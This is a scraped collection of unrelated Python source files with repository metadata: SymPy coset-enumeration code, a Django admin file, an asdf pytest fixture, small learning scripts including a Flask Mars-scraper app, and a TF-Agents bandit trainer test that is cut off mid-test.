    # indices of the dead cosets, in increasing order (used for renumbering)
    chi = tuple([i for i in range(len(self.p)) if self.p[i] != i])
    for alpha in self.omega:
        gamma += 1
        if gamma != alpha:
            # replace alpha by gamma in coset table: copy row alpha into
            # row gamma.  The inverse entries table[beta][A_dict_inv[x]]
            # still hold the old number alpha; they are renumbered to the
            # compressed value by the bisect pass below.  (A previous
            # version contained the no-op comparison
            # ``table[beta][A_dict_inv[x]] == gamma`` here, now removed.)
            for x in A:
                beta = table[alpha][A_dict[x]]
                table[gamma][A_dict[x]] = beta
    # all the cosets in the table are live cosets
    self.p = list(range(gamma + 1))
    # delete the rows of the dead cosets
    del table[len(self.p):]
    # re-number every entry: old coset -> old coset minus the number of
    # dead cosets below it
    for row in table:
        for j in range(len(self.A)):
            row[j] -= bisect_left(chi, row[j])
def conjugates(self, R):
    """Partition the cyclic conjugates of the relators in ``R`` (and of
    their inverses) into one set per letter of the alphabet ``self.A``,
    bucketed by the first letter of each word.  Returns the list of
    buckets in the order of ``self.A``.
    """
    # gather every cyclic conjugate of each relator and of its inverse
    remaining = set()
    for rel in R:
        remaining.update(rel.cyclic_conjugates())
        remaining.update((rel**-1).cyclic_conjugates())
    # bucket the words by leading letter, shrinking ``remaining`` as we go
    buckets = []
    for letter in self.A:
        bucket = {word for word in remaining if word[0] == letter}
        buckets.append(bucket)
        remaining -= bucket
    return buckets
def coset_representative(self, coset):
    '''
    Compute the coset representative of a given coset.

    Examples
    ========

    >>> from sympy.combinatorics.free_groups import free_group
    >>> from sympy.combinatorics.fp_groups import FpGroup, coset_enumeration_r
    >>> F, x, y = free_group("x, y")
    >>> f = FpGroup(F, [x**3, y**3, x**-1*y**-1*x*y])
    >>> C = coset_enumeration_r(f, [x])
    >>> C.compress()
    >>> C.table
    [[0, 0, 1, 2], [1, 1, 2, 0], [2, 2, 0, 1]]
    >>> C.coset_representative(0)
    <identity>
    >>> C.coset_representative(1)
    y
    >>> C.coset_representative(2)
    y**-1

    '''
    # Coset 0 is the subgroup itself; its representative is the identity.
    # (Previously this check sat inside the loop below and was re-tested
    # after a needless table lookup on every iteration.)
    if coset == 0:
        return self.fp_group.identity
    # Walk towards coset 0 through any generator image that decreases the
    # coset number, building the representative word right-to-left.
    # Assumes a compressed/standardized table where such an image exists
    # for every live coset > 0.
    for x in self.A:
        gamma = self.table[coset][self.A_dict[x]]
        if gamma < coset:
            return self.coset_representative(gamma)*x**-1
##############################
#      Modified Methods      #
##############################

def modified_define(self, alpha, x):
    r"""
    Define a function p_p from [1..n] to A* as
    an additional component of the modified coset table.

    Parameters
    ==========

    \alpha \in \Omega
    x \in A*

    See Also
    ========

    define
    """
    # thin wrapper: ``define`` with modified=True maintains p_p as well
    self.define(alpha, x, modified=True)
def modified_scan(self, alpha, w, y, fill=False):
    r"""
    Scan `\alpha` under ``w`` in the modified (augmented) coset table.

    Parameters
    ==========

    \alpha \in \Omega
    w \in A*
    y \in (YUY^-1)
    fill -- `modified_scan_and_fill` when set to True.

    See Also
    ========

    scan
    """
    self.scan(alpha, w, y=y, fill=fill, modified=True)
def modified_scan_and_fill(self, alpha, w, y):
    r"""
    Variant of ``scan_and_fill`` for the modified coset table: scan
    `\alpha` under ``w``, making new definitions whenever the scan is
    incomplete, while keeping the word component ``y`` up to date.

    See Also
    ========

    modified_scan, scan_and_fill
    """
    self.modified_scan(alpha, w, y, fill=True)
def modified_merge(self, k, lamda, w, q):
    r"""
    Merge two classes in the modified coset-table algorithm, keeping the
    coset-representative words consistent.

    Parameters
    ==========

    'k', 'lamda' -- the two class representatives to be merged.
    q -- queue of length l of elements to be deleted from `\Omega` *.
    w -- Word in (YUY^-1)

    See Also
    ========

    merge
    """
    self.merge(k, lamda, q, w=w, modified=True)
def modified_rep(self, k):
    r"""
    Parameters
    ==========

    `k \in [0 \ldots n-1]`

    Returns
    =======

    The representative of the class containing ``k``, while updating the
    modified coset-table bookkeeping (path compression of ``p`` and the
    word array ``p_p``).

    See Also
    ========

    rep
    """
    # BUG FIX: the representative computed by ``rep`` was previously
    # discarded (no return), so modified_rep always returned None while
    # ``rep`` itself returns the representative.
    return self.rep(k, modified=True)
def modified_coincidence(self, alpha, beta, w):
    r"""
    Process a coincidence in the modified coset-table algorithm.

    Parameters
    ==========

    A coincident pair `\alpha, \beta \in \Omega, w \in Y \cup Y^{-1}`

    See Also
    ========

    coincidence
    """
    self.coincidence(alpha, beta, w=w, modified=True)
###############################################################################
#                           COSET ENUMERATION                                 #
###############################################################################

# relator-based method
def coset_enumeration_r(fp_grp, Y, max_cosets=None, draft=None,
                        incomplete=False, modified=False):
    """
    This is easier of the two implemented methods of coset enumeration.
    and is often called the HLT method, after Hazelgrove, Leech, Trotter
    The idea is that we make use of ``scan_and_fill`` makes new definitions
    whenever the scan is incomplete to enable the scan to complete; this way
    we fill in the gaps in the scan of the relator or subgroup generator,
    that's why the name relator-based method.

    An instance of `CosetTable` for `fp_grp` can be passed as the keyword
    argument `draft` in which case the coset enumeration will start with
    that instance and attempt to complete it.

    When `incomplete` is `True` and the function is unable to complete for
    some reason, the partially complete table will be returned.

    # TODO: complete the docstring

    See Also
    ========

    scan_and_fill,

    Examples
    ========

    >>> from sympy.combinatorics.free_groups import free_group
    >>> from sympy.combinatorics.fp_groups import FpGroup, coset_enumeration_r
    >>> F, x, y = free_group("x, y")

    # Example 5.1 from [1]
    >>> f = FpGroup(F, [x**3, y**3, x**-1*y**-1*x*y])
    >>> C = coset_enumeration_r(f, [x])
    >>> for i in range(len(C.p)):
    ...     if C.p[i] == i:
    ...         print(C.table[i])
    [0, 0, 1, 2]
    [1, 1, 2, 0]
    [2, 2, 0, 1]
    >>> C.p
    [0, 1, 2, 1, 1]

    # Example from exercises Q2 [1]
    >>> f = FpGroup(F, [x**2*y**2, y**-1*x*y*x**-3])
    >>> C = coset_enumeration_r(f, [])
    >>> C.compress(); C.standardize()
    >>> C.table
    [[1, 2, 3, 4],
    [5, 0, 6, 7],
    [0, 5, 7, 6],
    [7, 6, 5, 0],
    [6, 7, 0, 5],
    [2, 1, 4, 3],
    [3, 4, 2, 1],
    [4, 3, 1, 2]]

    # Example 5.2
    >>> f = FpGroup(F, [x**2, y**3, (x*y)**3])
    >>> Y = [x*y]
    >>> C = coset_enumeration_r(f, Y)
    >>> for i in range(len(C.p)):
    ...     if C.p[i] == i:
    ...         print(C.table[i])
    [1, 1, 2, 1]
    [0, 0, 0, 2]
    [3, 3, 1, 0]
    [2, 2, 3, 3]

    # Example 5.3
    >>> f = FpGroup(F, [x**2*y**2, x**3*y**5])
    >>> Y = []
    >>> C = coset_enumeration_r(f, Y)
    >>> for i in range(len(C.p)):
    ...     if C.p[i] == i:
    ...         print(C.table[i])
    [1, 3, 1, 3]
    [2, 0, 2, 0]
    [3, 1, 3, 1]
    [0, 2, 0, 2]

    # Example 5.4
    >>> F, a, b, c, d, e = free_group("a, b, c, d, e")
    >>> f = FpGroup(F, [a*b*c**-1, b*c*d**-1, c*d*e**-1, d*e*a**-1, e*a*b**-1])
    >>> Y = [a]
    >>> C = coset_enumeration_r(f, Y)
    >>> for i in range(len(C.p)):
    ...     if C.p[i] == i:
    ...         print(C.table[i])
    [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]

    # example of "compress" method
    >>> C.compress()
    >>> C.table
    [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]

    # Exercises Pg. 161, Q2.
    >>> F, x, y = free_group("x, y")
    >>> f = FpGroup(F, [x**2*y**2, y**-1*x*y*x**-3])
    >>> Y = []
    >>> C = coset_enumeration_r(f, Y)
    >>> C.compress()
    >>> C.standardize()
    >>> C.table
    [[1, 2, 3, 4],
    [5, 0, 6, 7],
    [0, 5, 7, 6],
    [7, 6, 5, 0],
    [6, 7, 0, 5],
    [2, 1, 4, 3],
    [3, 4, 2, 1],
    [4, 3, 1, 2]]

    # John J. Cannon; Lucien A. Dimino; George Havas; Jane M. Watson
    # Mathematics of Computation, Vol. 27, No. 123. (Jul., 1973), pp. 463-490
    # from 1973chwd.pdf
    # Table 1. Ex. 1
    >>> F, r, s, t = free_group("r, s, t")
    >>> E1 = FpGroup(F, [t**-1*r*t*r**-2, r**-1*s*r*s**-2, s**-1*t*s*t**-2])
    >>> C = coset_enumeration_r(E1, [r])
    >>> for i in range(len(C.p)):
    ...     if C.p[i] == i:
    ...         print(C.table[i])
    [0, 0, 0, 0, 0, 0]

    Ex. 2
    >>> F, a, b = free_group("a, b")
    >>> Cox = FpGroup(F, [a**6, b**6, (a*b)**2, (a**2*b**2)**2, (a**3*b**3)**5])
    >>> C = coset_enumeration_r(Cox, [a])
    >>> index = 0
    >>> for i in range(len(C.p)):
    ...     if C.p[i] == i:
    ...         index += 1
    >>> index
    500

    # Ex. 3
    >>> F, a, b = free_group("a, b")
    >>> B_2_4 = FpGroup(F, [a**4, b**4, (a*b)**4, (a**-1*b)**4, (a**2*b)**4, \
            (a*b**2)**4, (a**2*b**2)**4, (a**-1*b*a*b)**4, (a*b**-1*a*b)**4])
    >>> C = coset_enumeration_r(B_2_4, [a])
    >>> index = 0
    >>> for i in range(len(C.p)):
    ...     if C.p[i] == i:
    ...         index += 1
    >>> index
    1024

    References
    ==========

    .. [1] Holt, D., Eick, B., O'Brien, E.
           "Handbook of computational group theory"

    """
    # 1. Initialize a coset table C for < X|R >
    C = CosetTable(fp_grp, Y, max_cosets=max_cosets)
    # Define coset table methods.
    if modified:
        _scan_and_fill = C.modified_scan_and_fill
        _define = C.modified_define
    else:
        _scan_and_fill = C.scan_and_fill
        _define = C.define
    if draft:
        # resume a previously started (partial) enumeration
        C.table = draft.table[:]
        C.p = draft.p[:]
    R = fp_grp.relators
    A_dict = C.A_dict
    p = C.p
    # scan coset 0 (the subgroup itself) under every subgroup generator
    for i in range(0, len(Y)):
        if modified:
            _scan_and_fill(0, Y[i], C._grp.generators[i])
        else:
            _scan_and_fill(0, Y[i])
    alpha = 0
    while alpha < C.n:
        if p[alpha] == alpha:
            try:
                for w in R:
                    if modified:
                        _scan_and_fill(alpha, w, C._grp.identity)
                    else:
                        _scan_and_fill(alpha, w)
                    # if alpha was eliminated during the scan then break
                    if p[alpha] < alpha:
                        break
                if p[alpha] == alpha:
                    # fill any still-undefined entries of row alpha
                    for x in A_dict:
                        if C.table[alpha][A_dict[x]] is None:
                            _define(alpha, x)
            except ValueError as e:
                # the table exceeded max_cosets
                if incomplete:
                    return C
                raise e
        alpha += 1
    return C
def modified_coset_enumeration_r(fp_grp, Y, max_cosets=None, draft=None,
                                 incomplete=False):
    r"""
    Introduce a new set of symbols y \in Y that correspond to the
    generators of the subgroup. Store the elements of Y as a
    word P[\alpha, x] and compute the coset table similar to that of
    the regular coset enumeration methods.

    Examples
    ========

    >>> from sympy.combinatorics.free_groups import free_group
    >>> from sympy.combinatorics.fp_groups import FpGroup, coset_enumeration_r
    >>> from sympy.combinatorics.coset_table import modified_coset_enumeration_r
    >>> F, x, y = free_group("x, y")
    >>> f = FpGroup(F, [x**3, y**3, x**-1*y**-1*x*y])
    >>> C = modified_coset_enumeration_r(f, [x])
    >>> C.table
    [[0, 0, 1, 2], [1, 1, 2, 0], [2, 2, 0, 1], [None, 1, None, None], [1, 3, None, None]]

    See Also
    ========

    coset_enumeration_r

    References
    ==========

    .. [1] Holt, D., Eick, B., O'Brien, E.,
           "Handbook of Computational Group Theory",
           Section 5.3.2
    """
    # delegate to the relator-based enumerator with modified=True
    return coset_enumeration_r(fp_grp, Y, max_cosets=max_cosets, draft=draft,
                               incomplete=incomplete, modified=True)
# Pg. 166
# coset-table based method
def coset_enumeration_c(fp_grp, Y, max_cosets=None, draft=None,
                        incomplete=False):
    """
    Coset-table based (Felsch-style) coset enumeration: definitions are
    followed immediately by processing all deductions they create.

    >>> from sympy.combinatorics.free_groups import free_group
    >>> from sympy.combinatorics.fp_groups import FpGroup, coset_enumeration_c
    >>> F, x, y = free_group("x, y")
    >>> f = FpGroup(F, [x**3, y**3, x**-1*y**-1*x*y])
    >>> C = coset_enumeration_c(f, [x])
    >>> C.table
    [[0, 0, 1, 2], [1, 1, 2, 0], [2, 2, 0, 1]]
    """
    # Initialize a coset table C for < X|R >
    X = fp_grp.generators
    R = fp_grp.relators
    C = CosetTable(fp_grp, Y, max_cosets=max_cosets)
    if draft:
        # resume a partial enumeration: every already-defined entry is
        # treated as a pending deduction
        C.table = draft.table[:]
        C.p = draft.p[:]
        C.deduction_stack = draft.deduction_stack
        for alpha, x in product(range(len(C.table)), X):
            if not C.table[alpha][C.A_dict[x]] is None:
                C.deduction_stack.append((alpha, x))
    A = C.A
    # replace all the elements by cyclic reductions
    R_cyc_red = [rel.identity_cyclic_reduction() for rel in R]
    R_c = list(chain.from_iterable((rel.cyclic_conjugates(), (rel**-1).cyclic_conjugates()) \
            for rel in R_cyc_red))
    R_set = set()
    for conjugate in R_c:
        R_set = R_set.union(conjugate)
    # a list of subsets of R_c whose words start with "x".
    R_c_list = []
    for x in C.A:
        r = {word for word in R_set if word[0] == x}
        R_c_list.append(r)
        R_set.difference_update(r)
    # scan coset 0 under the subgroup generators, then process deductions
    for w in Y:
        C.scan_and_fill_c(0, w)
    for x in A:
        C.process_deductions(R_c_list[C.A_dict[x]], R_c_list[C.A_dict_inv[x]])
    alpha = 0
    while alpha < len(C.table):
        if C.p[alpha] == alpha:
            try:
                for x in C.A:
                    # alpha may die while its own row is being completed
                    if C.p[alpha] != alpha:
                        break
                    if C.table[alpha][C.A_dict[x]] is None:
                        C.define_c(alpha, x)
                        C.process_deductions(R_c_list[C.A_dict[x]], R_c_list[C.A_dict_inv[x]])
            except ValueError as e:
                # the table exceeded max_cosets
                if incomplete:
                    return C
                raise e
        alpha += 1
    return C
| [
"kaunalei@gmail.com"
] | kaunalei@gmail.com |
e76c6838f7e87301d6e09a08741750b7f783d361 | 023d045733bb30b2c0cc501908c0dd3de4d2945f | /standssubmission/standsreview/admin.py | 5242b9d5140b17255896969bd652b374065828cd | [] | no_license | pieterdp/fosdem-stand-submission | 3da4a2158935fb54f9a6edeff124050efed3738e | 3bd6355e53014160fbdd15970f142c24adb040cd | refs/heads/master | 2023-01-28T04:38:50.037785 | 2020-12-06T19:58:13 | 2020-12-06T19:58:13 | 307,077,984 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 158 | py | from django.contrib import admin
from .models import Review, Decision
# Register your models here.
admin.site.register(Review)
admin.site.register(Decision)
| [
"pieter.de.praetere@helptux.be"
] | pieter.de.praetere@helptux.be |
f415d23be4af1035d4cbc400cd5f475a7c165207 | 9bd29c69d1d65954e6594a8b371a9aa67f010a81 | /conftest.py | 9c6f052141d35eddc85238884bea5afdcb35ed99 | [] | no_license | jhunkeler/asdf | 0bb11701b64075d714add13061e85fc1ccbaa8aa | 1b41c6d04f657940c3fc02443dd3bdfd78619ba8 | refs/heads/master | 2022-03-06T04:31:18.237751 | 2019-10-22T16:22:00 | 2019-10-22T16:22:00 | 109,301,360 | 0 | 0 | null | 2017-11-02T18:07:26 | 2017-11-02T18:07:26 | null | UTF-8 | Python | false | false | 798 | py | # Licensed under a 3-clause BSD style license - see LICENSE.rst
# -*- coding: utf-8 -*-
import os
import pytest
from _pytest.doctest import DoctestItem
@pytest.fixture(autouse=True)
def _docdir(request):
    """
    Make sure that doctests run in a temporary directory so that any files that
    are created as part of the test get removed automatically.
    """
    # Trigger ONLY for the doctests.
    if isinstance(request.node, DoctestItem):
        # Get the fixture dynamically by its name.
        tmpdir = request.getfixturevalue('tmpdir')
        # Chdir only for the duration of the test.
        olddir = os.getcwd()
        tmpdir.chdir()
        # NOTE(review): pytest resumes a yield-fixture for teardown even on
        # test failure, so the chdir back below normally runs; a try/finally
        # would make that explicit.
        yield
        os.chdir(olddir)
    else:
        # For normal tests, we have to yield, since this is a yield-fixture.
        yield
| [
"ddavella@stsci.edu"
] | ddavella@stsci.edu |
4f8fa08437a586f911ad3dfd31be2c934da9fe01 | a6dff3b91e0b335621c682d68605ccb91478abf7 | /day9.py | 229f88cad4549125dc28e3c4a466266a9bb3effd | [] | no_license | prasansabhagat/python | b088e7d67ab388cbee5acbf987d1ee780204123b | 323c5e5f0544042fb175faad8be99969301575c3 | refs/heads/main | 2023-07-13T02:28:13.993340 | 2021-08-15T16:45:41 | 2021-08-15T16:45:41 | 393,764,787 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 457 | py | #ctrl + ] -- for indentation
# Collect bids from successive users until nobody else wants to bid.
bid_dictionary = {}
bidding_finished = False
while not bidding_finished:
    name = input("What is your name? ")
    bid = input("How much amount do you want to bid? Rs")
    # BUG FIX: was ``bid_dictionary[name] = price`` -- ``price`` is never
    # defined anywhere and raised NameError; the entered amount is ``bid``.
    bid_dictionary[name] = bid
    question = input("Is there other person who wants to bid? yes or no ")
    if question == "no":
        bidding_finished = True
    elif question == "yes":
        print("Welcome to the secret auction program `~'")
| [
"75807786+prasansabhagat@users.noreply.github.com"
] | 75807786+prasansabhagat@users.noreply.github.com |
95ae8d1b15002d3d3c3c64d60796b3909dd9c81b | cc6d94c5f0c066abdfa68c70766ed67901d2a60a | /.ipynb_checkpoints/app-checkpoint.py | b8c70774cfd1e1566a3961176091da8907a1b77f | [] | no_license | ThinhNg/MissionToMarsScrape | 82d85318bb9c82a6cd9190b946e5ae763647fd3a | ba5ff4fcc933d91f250458da5d114f97d4cba2d8 | refs/heads/master | 2020-04-23T08:59:59.660423 | 2020-03-28T03:42:47 | 2020-03-28T03:42:47 | 171,054,972 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 954 | py | from flask import Flask, render_template, redirect
from flask_pymongo import PyMongo
# BUG FIX: ``import mission_to_mars.py`` tries to import a submodule named
# ``py`` inside a ``mission_to_mars`` package and fails at runtime; the
# module itself must be imported (it is used as ``mission_to_mars.scrape()``).
import mission_to_mars
# Create an instance of Flask
app = Flask(__name__)
# Use PyMongo to establish Mongo connection
mongo = PyMongo(app, uri="mongodb://localhost:27017/Mars_Data")
# Route to render index.html template using data from Mongo
@app.route("/")
def home():
    """Render the home page using the latest scraped Mars data in Mongo."""
    # Find one record of data from the mongo database
    MartianData = mongo.db.collection.find_one()
    # Return template and data
    return render_template("index.html", Martian=MartianData)
# Route that will trigger the scrape function
@app.route("/scrape")
def scrape():
    """Scrape fresh Mars data, store it in Mongo, then redirect home."""
    # Run the scrape function
    MartianData = mission_to_mars.scrape()
    # Update the Mongo database using update and upsert=True
    # NOTE(review): PyMongo's collection.update() is deprecated; consider
    # replace_one({}, MartianData, upsert=True) instead.
    mongo.db.collection.update({}, MartianData, upsert=True)
    # Redirect back to home page
    return redirect("/")
# Script entry point: start the Flask development server with debugging on.
if __name__ == "__main__":
    app.run(debug=True)
| [
"thinhnguyenns@gmail.com"
] | thinhnguyenns@gmail.com |
aa893b07c3613f505969019869fe7e5913d60a10 | 8634b4f7f2293bf431ba8ed59e95f80abc59483f | /Homework/10/orderdict.py | fae771bb2e90cba4047e19dc516c8e03b0f7b948 | [] | no_license | TitanVA/Metiz | e1e2dca42118f660356254c39c7fadc47f772719 | e54f10b98226e102a5bb1eeda7f1e1eb30587c32 | refs/heads/master | 2020-12-22T11:44:58.746055 | 2020-02-10T14:41:16 | 2020-02-10T14:41:16 | 236,770,476 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 358 | py | from _collections import OrderedDict
# OrderedDict preserves insertion order, so the names print in the order
# they were added.
_pairs = [
    ('jen', 'python'),
    ('sarah', 'c'),
    ('edward', 'ruby'),
    ('phil', 'python'),
]
favorite_languages = OrderedDict(_pairs)

for name, language in favorite_languages.items():
    print(f"{name.title()}'s favorite language is {language.title()}.")
| [
"viktorbezai@gmail.com"
] | viktorbezai@gmail.com |
8d953f282b7786cb90d112bd8b7f8fd2757af599 | b064696e34a31d2f23eb5da4f364a09542428b44 | /tf_agents/bandits/agents/examples/v2/trainer_test.py | d9117e9018d28a7092aa409817daa2ffa23575b0 | [
"Apache-2.0"
] | permissive | vraoresearch/agents | affead659efd3b5ac232d3d9ff60a1fabe74250e | 58ffe1eec6e38a2cddcf34834d795b37e3b8843b | refs/heads/master | 2022-11-19T10:01:54.906271 | 2022-10-27T14:41:56 | 2022-10-27T14:42:23 | 293,401,771 | 0 | 1 | Apache-2.0 | 2020-09-07T02:23:54 | 2020-09-07T02:23:53 | null | UTF-8 | Python | false | false | 11,646 | py | # coding=utf-8
# Copyright 2020 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tf_agents.bandits.agents.examples.v2.trainer."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import os
import tempfile
from unittest import mock
from absl import logging
from absl.testing import parameterized
import tensorflow as tf # pylint: disable=g-explicit-tensorflow-version-import
import tensorflow_probability as tfp
from tf_agents.bandits.agents import exp3_agent
from tf_agents.bandits.agents.examples.v2 import trainer
from tf_agents.bandits.agents.examples.v2 import trainer_test_utils
from tf_agents.bandits.environments import environment_utilities
from tf_agents.bandits.environments import random_bandit_environment
from tf_agents.bandits.environments import stationary_stochastic_py_environment
from tf_agents.bandits.environments import wheel_py_environment
from tf_agents.bandits.metrics import tf_metrics as tf_bandit_metrics
from tf_agents.environments import tf_py_environment
from tf_agents.metrics import export_utils
from tf_agents.specs import tensor_spec
tfd = tfp.distributions
tf.compat.v1.enable_v2_behavior()
def get_bounded_reward_random_environment(
    observation_shape, action_shape, batch_size, num_actions):
  """Returns a RandomBanditEnvironment with U(0, 1) observation and reward.

  Args:
    observation_shape: shape (list) of a single, unbatched observation.
    action_shape: shape of a single action.
    batch_size: number of parallel environment rows per step.
    num_actions: number of discrete actions; valid actions are
      `0 .. num_actions - 1`.
  """
  overall_shape = [batch_size] + observation_shape
  # Observations are i.i.d. U(0, 1) over the whole batched shape.
  observation_distribution = tfd.Independent(
      tfd.Uniform(low=tf.zeros(overall_shape), high=tf.ones(overall_shape)))
  # Rewards are U(0, 1) per batch row, independent of the chosen action.
  reward_distribution = tfd.Uniform(
      low=tf.zeros(batch_size), high=tf.ones(batch_size))
  action_spec = tensor_spec.BoundedTensorSpec(
      shape=action_shape, dtype=tf.int32, minimum=0, maximum=num_actions - 1)
  return random_bandit_environment.RandomBanditEnvironment(
      observation_distribution, reward_distribution, action_spec)
def get_environment_and_optimal_functions_by_name(environment_name, batch_size):
  """Builds a bandit environment and its optimal reward/action functions.

  Args:
    environment_name: one of 'stationary_stochastic' or 'wheel'.
    batch_size: batch size used by the environment.

  Returns:
    A tuple `(environment, optimal_reward_fn, optimal_action_fn)`.

  Raises:
    ValueError: if `environment_name` is not a supported name.
  """
  if environment_name == 'stationary_stochastic':
    context_dim = 7
    num_actions = 5
    action_reward_fns = (
        environment_utilities.sliding_linear_reward_fn_generator(
            context_dim, num_actions, 0.1))
    py_env = (
        stationary_stochastic_py_environment
        .StationaryStochasticPyEnvironment(
            functools.partial(
                environment_utilities.context_sampling_fn,
                batch_size=batch_size,
                context_dim=context_dim),
            action_reward_fns,
            batch_size=batch_size))
    optimal_reward_fn = functools.partial(
        environment_utilities.tf_compute_optimal_reward,
        per_action_reward_fns=action_reward_fns)
    optimal_action_fn = functools.partial(
        environment_utilities.tf_compute_optimal_action,
        per_action_reward_fns=action_reward_fns)
    environment = tf_py_environment.TFPyEnvironment(py_env)
  elif environment_name == 'wheel':
    delta = 0.5
    mu_base = [0.05, 0.01, 0.011, 0.009, 0.012]
    std_base = [0.001] * 5
    mu_high = 0.5
    std_high = 0.001
    py_env = wheel_py_environment.WheelPyEnvironment(delta, mu_base, std_base,
                                                     mu_high, std_high,
                                                     batch_size)
    environment = tf_py_environment.TFPyEnvironment(py_env)
    optimal_reward_fn = functools.partial(
        environment_utilities.tf_wheel_bandit_compute_optimal_reward,
        delta=delta,
        mu_inside=mu_base[0],
        mu_high=mu_high)
    optimal_action_fn = functools.partial(
        environment_utilities.tf_wheel_bandit_compute_optimal_action,
        delta=delta)
  else:
    # BUG FIX: an unknown name previously fell through to the return
    # statement and raised a confusing NameError on the unbound locals;
    # fail fast with a clear message instead.
    raise ValueError('Unknown environment name: {}'.format(environment_name))
  return (environment, optimal_reward_fn, optimal_action_fn)
class MockLog(mock.Mock):
  """Mock logger that records each formatted message passed to `info`."""

  def __init__(self, *args, **kwargs):
    super(MockLog, self).__init__(*args, **kwargs)
    # Formatted messages, in the order they were logged.
    self.lines = []

  def info(self, message, *args):
    formatted = message % args
    self.lines.append(formatted)
    logging.info(message, *args)

  def as_string(self):
    # One recorded message per line.
    return '\n'.join(self.lines)
class TrainerTest(tf.test.TestCase, parameterized.TestCase):
  # Integration-style tests for the bandit `trainer.train` loop: checkpoint
  # export, end-to-end (environment, agent) smoke runs, and the
  # `resume_training_loops` semantics.

  @parameterized.named_parameters(
      dict(testcase_name='_0',
           num_actions=11,
           observation_shape=[8],
           action_shape=[],
           batch_size=32,
           training_loops=10,
           steps_per_loop=10,
           learning_rate=.1),
      dict(testcase_name='_1',
           num_actions=73,
           observation_shape=[5, 4, 3, 2],
           action_shape=[],
           batch_size=121,
           training_loops=7,
           steps_per_loop=8,
           learning_rate=.5),
  )
  def testTrainerExportsCheckpoints(self,
                                    num_actions,
                                    observation_shape,
                                    action_shape,
                                    batch_size,
                                    training_loops,
                                    steps_per_loop,
                                    learning_rate):
    """Exercises trainer code, checks that expected checkpoints are exported."""
    root_dir = tempfile.mkdtemp(dir=os.getenv('TEST_TMPDIR'))
    environment = get_bounded_reward_random_environment(
        observation_shape, action_shape, batch_size, num_actions)
    agent = exp3_agent.Exp3Agent(
        learning_rate=learning_rate,
        time_step_spec=environment.time_step_spec(),
        action_spec=environment.action_spec())
    # Train three times against the same root_dir: each call should advance
    # the global step by `training_loops`, and the latest checkpoint filename
    # encodes the cumulative step count.
    for i in range(1, 4):
      trainer.train(
          root_dir=root_dir,
          agent=agent,
          environment=environment,
          training_loops=training_loops,
          steps_per_loop=steps_per_loop)
      latest_checkpoint = tf.train.latest_checkpoint(root_dir)
      expected_checkpoint_regex = '.*-{}'.format(i * training_loops)
      self.assertRegex(latest_checkpoint, expected_checkpoint_regex)

  @parameterized.named_parameters(
      dict(testcase_name='_stat_stoch__linucb',
           environment_name='stationary_stochastic',
           agent_name='LinUCB'),
      dict(testcase_name='_stat_stoch__lints',
           environment_name='stationary_stochastic',
           agent_name='LinTS'),
      dict(testcase_name='_stat_stoch__epsgreedy',
           environment_name='stationary_stochastic',
           agent_name='epsGreedy'),
      dict(testcase_name='_wheel__linucb',
           environment_name='wheel',
           agent_name='LinUCB'),
      dict(testcase_name='_wheel__lints',
           environment_name='wheel',
           agent_name='LinTS'),
      dict(testcase_name='_wheel__epsgreedy',
           environment_name='wheel',
           agent_name='epsGreedy'),
      dict(testcase_name='_wheel__mix',
           environment_name='wheel',
           agent_name='mix'),
  )
  def testAgentAndEnvironmentRuns(self, environment_name, agent_name):
    # Smoke test: every (environment, agent) pairing trains without error and
    # logs both custom metrics plus a loss line exactly once per training loop.
    batch_size = 8
    training_loops = 3
    steps_per_loop = 2
    (environment, optimal_reward_fn, optimal_action_fn
    ) = trainer_test_utils.get_environment_and_optimal_functions_by_name(
        environment_name, batch_size)
    agent = trainer_test_utils.get_agent_by_name(agent_name,
                                                 environment.time_step_spec(),
                                                 environment.action_spec())
    regret_metric = tf_bandit_metrics.RegretMetric(optimal_reward_fn)
    suboptimal_arms_metric = tf_bandit_metrics.SuboptimalArmsMetric(
        optimal_action_fn)
    # Replace the module-level logger with MockLog so the assertions below can
    # count how many times each metric name was logged.
    with mock.patch.object(
        export_utils, 'logging', new_callable=MockLog) as mock_logging:
      trainer.train(
          root_dir=tempfile.mkdtemp(dir=os.getenv('TEST_TMPDIR')),
          agent=agent,
          environment=environment,
          training_loops=training_loops,
          steps_per_loop=steps_per_loop,
          additional_metrics=[regret_metric, suboptimal_arms_metric])
      logged = mock_logging.as_string()
    self.assertEqual(logged.count('RegretMetric'), training_loops)
    self.assertEqual(logged.count('SuboptimalArmsMetric'), training_loops)
    self.assertEqual(logged.count('loss'), training_loops)

  def testResumeTrainLoops(self):
    # Verifies `resume_training_loops`: with True, re-running with the same
    # (or smaller) `training_loops` does no extra work, while a larger value
    # trains only the difference; with False, every call trains in full.
    batch_size = 8
    training_loops = 3
    steps_per_loop = 2
    environment_name = 'stationary_stochastic'
    agent_name = 'epsGreedy'
    environment, _, _ = (
        trainer_test_utils.get_environment_and_optimal_functions_by_name(
            environment_name, batch_size))
    agent = trainer_test_utils.get_agent_by_name(agent_name,
                                                 environment.time_step_spec(),
                                                 environment.action_spec())
    root_dir = tempfile.mkdtemp(dir=os.getenv('TEST_TMPDIR'))

    def train(training_loops, resume_training_loops):
      # Helper: run trainer.train against the shared root_dir.
      trainer.train(
          root_dir=root_dir,
          agent=agent,
          environment=environment,
          training_loops=training_loops,
          steps_per_loop=steps_per_loop,
          resume_training_loops=resume_training_loops)

    with mock.patch.object(
        export_utils, 'logging', new_callable=MockLog) as mock_logging:
      train(training_loops=training_loops, resume_training_loops=True)
      logged = mock_logging.as_string()
    self.assertEqual(logged.count('loss'), training_loops)
    self.assertEqual(logged.count('AverageReturn'), training_loops)
    # With `resume_training_loops` set to True, the same `training_loops`
    # would not result in more training.
    with mock.patch.object(
        export_utils, 'logging', new_callable=MockLog) as mock_logging:
      train(training_loops=training_loops, resume_training_loops=True)
      logged = mock_logging.as_string()
